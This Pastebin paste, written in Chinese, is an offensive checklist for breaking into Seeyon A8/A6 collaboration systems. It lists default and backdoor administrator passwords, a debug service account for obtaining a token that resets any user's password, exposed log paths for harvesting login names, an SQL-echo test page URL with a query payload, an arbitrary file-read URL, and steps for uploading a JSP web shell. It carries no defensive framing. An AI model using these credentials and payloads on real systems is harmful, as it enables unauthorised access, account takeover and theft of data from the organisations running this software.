Advertisement
Guest User

Untitled

a guest
Dec 7th, 2017
434
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.08 KB | None | 0 0
  1. 1:收集致远A8的公开的用户名及密码
  2.  
  3. 系统管理员(所有版本)
  4. system system
  5. 集团管理员(企业集团版)
  6. group-admin 123456
  7. 单位管理员(企业版、政务版)
  8. admin1 123456
  9. 组织管理员(政务多组织版)
  10. gov-admin 123456
  11. 审计管理员(所有版本)
  12. audit-admin 123456
  13. A8-V5[企业版]默认超级管理员:system:system
  14. A8-V5[集团版]默认超级管理员:group-admin:123456
  15. 2:获取token 修改用户密码
  16.  
  17. /seeyon/services/authorityService?wsdl
  18.  
  19. 通过调试接口的默认用户
  20. userName:service-admin
  21. password:123456
  22. 获取万能Token
  23. 之后可以修改任意用户密码。
  24. 案例:致远A8协同系统存在任意用户密码修改漏洞(秒改)
  25. 3:获取LoginName
  26.  
  27. 访问地址:
  28. /seeyon/logs/ //设置不当结合目录浏览漏洞
  29. /seeyon/logs/login.log
  30. /seeyon/logs/ctp.log
  31. /seeyon/logs/uc.log //如果UC配置在互联网或者本地恶意员工利用可以劫持UC登录。
  32.  
  33.  
  34. 4:暴力破解,平行越权
  35.  
  36. 致远A8-V5存在两个漏洞
  37. 一是无视验证码撞库
  38. 二是任意用户密码修改
  39. 案例:致远A8-V5存在任意用户密码修改漏洞
  40.  
  41.  
  42. 5:A8-m seeyon后台万能密码
  43.  
  44. 密码:WLCCYBD@SEEYON
  45.  
  46. 登陆地址: /seeyon/management/status.jsp
  47. 成功之后 输入 login 查看登录日志
  48. 6:A6-m存在执行SQL语句页面回显功能
  49.  
  50. /yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir
  51. 7:A8 存在未授权访问
  52.  
  53. 该地址为性能监控后台,存在未授权访问
  54.  
  55. seeyon/management/status.jsp
  56. 任意文件读取漏洞,由于对filename未进行过滤,导致可下载读取任意文件
  57.  
  58. http://x.x.x.x/seeyon/main.do?method=officeDown&filename=c:/boot.ini
  59. 详细案例:用友致远A8协同管理软件未授权访问+Getshell
  60.  
  61. 8:登陆后台,Getshell
  62.  
  63. 1.利用合法会话获取模板的ID
  64.  
  65. 2.突破限制上传jsp可执行文件
  66.  
  67. 3.利用动态迁移技术将缓存到web目录以外的文件迁移到web任意目录
  68.  
  69. 案例:致远A8-V5协同管理软件普通用户任意文件上传(通杀V5)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement